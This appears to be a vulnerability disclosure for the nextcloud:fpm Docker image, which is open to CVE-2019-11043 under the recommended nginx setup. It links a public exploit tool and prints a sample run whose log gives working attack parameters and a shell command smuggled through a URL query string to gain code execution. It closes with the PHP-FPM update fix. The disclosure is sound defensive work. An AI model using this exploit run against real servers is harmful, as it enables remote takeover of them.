Docker image with FPM is vulnerable to CVE-2019-11043

The CVE-2019-11043 vulnerability can be exploited in the latest nextcloud:fpm image. This is due to the specific nginx configuration recommended for nextcloud: https://github.com/nextcloud/docker#base-version---fpm https://github.com/nextcloud/documentation/blob/master/admin_manual/installation/nginx.rst https://github.com/nextcloud/docker/blob/master/.examples/docker-compose/with-nginx-proxy/mariadb/fpm/web/nginx.conf Here's the exploit: https://github.com/neex/phuip-fpizdam Sample exploit run: # ./phuip-fpizdam http://localhost:8080/ocs/v2.php 2019/10/22 19:36:29 Base status code is 200 2019/10/22 19:36:30 Status code 502 for qsl=1765, adding as a candidate 2019/10/22 19:36:31 The target is probably vulnerable. Possible QSLs: [1755 1760 1765] 2019/10/22 19:36:48 Attack params found: --qsl 1760 --pisos 191 --skip-detect 2019/10/22 19:36:48 Trying to set "session.auto_start=0"... 2019/10/22 19:36:50 Detect() returned attack params: --qsl 1760 --pisos 191 --skip-detect <-- REMEMBER THIS 2019/10/22 19:36:50 Performing attack using php.ini settings... 2019/10/22 19:36:52 Success! Was able to execute a command by appending "?a=/bin/sh+-c+'which+which'&" to URLs 2019/10/22 19:36:52 Trying to cleanup /tmp/a... 2019/10/22 19:36:52 Done! To fix the issue, you need to update PHP-FPM version in the nextcloud:fpm image. Reference: https://bugs.php.net/bug.php?id=78599 ## Impact Execute arbitrary PHP code on the target server